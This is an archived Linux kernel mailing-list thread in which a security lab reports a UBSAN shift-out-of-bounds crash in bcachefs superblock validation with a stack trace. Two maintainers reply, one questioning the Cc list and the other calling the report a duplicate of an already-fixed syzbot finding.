> __ubsan_handle_shift_out_of_bounds+0x24b/0x430 lib/ubsan.c:387
> validate_sb_layout.cold+0x1a/0x51 fs/bcachefs/super-io.c:310
> bch2_read_super+0x980/0x1000 fs/bcachefs/super-io.c:786
> bch2_fs_open+0x471/0x3890 fs/bcachefs/super.c:1922
> bch2_mount+0x538/0x13c0 fs/bcachefs/fs.c:1863
> legacy_get_tree+0x109/0x220 fs/fs_context.c:662
> vfs_get_tree+0x93/0x380 fs/super.c:1771
> do_new_mount fs/namespace.c:3337 [inline]
> path_mount+0x679/0x1e40 fs/namespace.c:3664
> do_mount fs/namespace.c:3677 [inline]
> __do_sys_mount fs/namespace.c:3886 [inline]
> __se_sys_mount fs/namespace.c:3863 [inline]
> __x64_sys_mount+0x287/0x310 fs/namespace.c:3863
> do_syscall_x64 arch/x86/entry/common.c:52 [inline]
> do_syscall_64+0x43/0x120 arch/x86/entry/common.c:83
> entry_SYSCALL_64_after_hwframe+0x6f/0x77
> RIP: 0033:0x7f41e1091b3e
> Code: 48 c7 c0 ff ff ff ff eb aa e8 be 0d 00 00 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 f3 0f 1e fa 49 89 ca b8 a5 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
> RSP: 002b:00007f41e1d22e38 EFLAGS: 00000202 ORIG_RAX: 00000000000000a5
> RAX: ffffffffffffffda RBX: 0000000000005d82 RCX: 00007f41e1091b3e
> RDX: 0000000020005d80 RSI: 0000000020000100 RDI: 00007f41e1d22e90
> RBP: 00007f41e1d22ed0 R08: 00007f41e1d22ed0 R09: 0000000000000080
> R10: 0000000000000080 R11: 0000000000000202 R12: 0000000020005d80
> R13: 0000000020000100 R14: 00007f41e1d22e90 R15: 0000000020005e00
> </TASK>
>
> Thank you for taking the time to read this email and we look forward to working with you further.
I'm not sure why this is getting Cc'd to linux-trace-kernel. That's for
anything to do with the tracing code (trace events, tracepoints, kprobes,
uprobes, function tracer etc).
What part of tracing is this for?
-- Steve
^ permalink raw reply [flat|nested] 3+ messages in thread
* Re: UBSAN: shift-out-of-bounds in validate_sb_layout
2024-05-20 14:31 ` Steven Rostedt
@ 2024-05-20 14:42 ` Kent Overstreet
0 siblings, 0 replies; 3+ messages in thread
From: Kent Overstreet @ 2024-05-20 14:42 UTC (permalink / raw)
To: Steven Rostedt; +Cc: Ubisectech Sirius, linux-trace-kernel, linux-kernel
On Mon, May 20, 2024 at 10:31:53AM -0400, Steven Rostedt wrote:
> On Mon, 20 May 2024 15:02:26 +0800
> "Ubisectech Sirius" <bugreport@ubisectech.com> wrote:
>
> > Hello.
> > We are Ubisectech Sirius Team, the vulnerability lab of China ValiantSec. Recently, our team has discovered a issue in Linux kernel 6.7. Attached to the email were a PoC file of the issue.
> >
> > Stack dump:
> > UBSAN: shift-out-of-bounds in fs/bcachefs/super-io.c:310:18
> > shift exponent 127 is too large for 32-bit type 'int'
> > CPU: 0 PID: 14408 Comm: syz-executor.3 Not tainted 6.7.0 #2
> > Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
> > Call Trace:
> > <TASK>
> > __dump_stack lib/dump_stack.c:88 [inline]
> > dump_stack_lvl+0x136/0x150 lib/dump_stack.c:106
> > ubsan_epilogue lib/ubsan.c:217 [inline]
> > __ubsan_handle_shift_out_of_bounds+0x24b/0x430 lib/ubsan.c:387
> > validate_sb_layout.cold+0x1a/0x51 fs/bcachefs/super-io.c:310
> > bch2_read_super+0x980/0x1000 fs/bcachefs/super-io.c:786
> > bch2_fs_open+0x471/0x3890 fs/bcachefs/super.c:1922
> > bch2_mount+0x538/0x13c0 fs/bcachefs/fs.c:1863
> > legacy_get_tree+0x109/0x220 fs/fs_context.c:662
> > vfs_get_tree+0x93/0x380 fs/super.c:1771
> > do_new_mount fs/namespace.c:3337 [inline]
> > path_mount+0x679/0x1e40 fs/namespace.c:3664
> > do_mount fs/namespace.c:3677 [inline]
> > __do_sys_mount fs/namespace.c:3886 [inline]
> > __se_sys_mount fs/namespace.c:3863 [inline]
> > __x64_sys_mount+0x287/0x310 fs/namespace.c:3863
> > do_syscall_x64 arch/x86/entry/common.c:52 [inline]
> > do_syscall_64+0x43/0x120 arch/x86/entry/common.c:83
> > entry_SYSCALL_64_after_hwframe+0x6f/0x77
> > RIP: 0033:0x7f41e1091b3e
> > Code: 48 c7 c0 ff ff ff ff eb aa e8 be 0d 00 00 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 f3 0f 1e fa 49 89 ca b8 a5 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
> > RSP: 002b:00007f41e1d22e38 EFLAGS: 00000202 ORIG_RAX: 00000000000000a5
> > RAX: ffffffffffffffda RBX: 0000000000005d82 RCX: 00007f41e1091b3e
> > RDX: 0000000020005d80 RSI: 0000000020000100 RDI: 00007f41e1d22e90
> > RBP: 00007f41e1d22ed0 R08: 00007f41e1d22ed0 R09: 0000000000000080
> > R10: 0000000000000080 R11: 0000000000000202 R12: 0000000020005d80
> > R13: 0000000020000100 R14: 00007f41e1d22e90 R15: 0000000020005e00
> > </TASK>
> >
> > Thank you for taking the time to read this email and we look forward to working with you further.
>
> I'm not sure why this is getting Cc'd to linux-trace-kernel. That's for
> anything to do with the tracing code (trace events, tracepoints, kprobes,
> uprobes, function tracer etc).
>
> What part of tracing is this for?
Everything I've seen from Ubisectech has been duplicates of stuff syzbot
found awhile ago and is already fixed.
^ permalink raw reply [flat|nested] 3+ messages in thread
end of thread, other threads:[~2024-05-20 14:42 UTC | newest]
Thread overview: 3+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2024-05-20 7:02 UBSAN: shift-out-of-bounds in validate_sb_layout Ubisectech Sirius
2024-05-20 14:31 ` Steven Rostedt
2024-05-20 14:42 ` Kent Overstreet
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox
all inboxes | Powered by JetHome®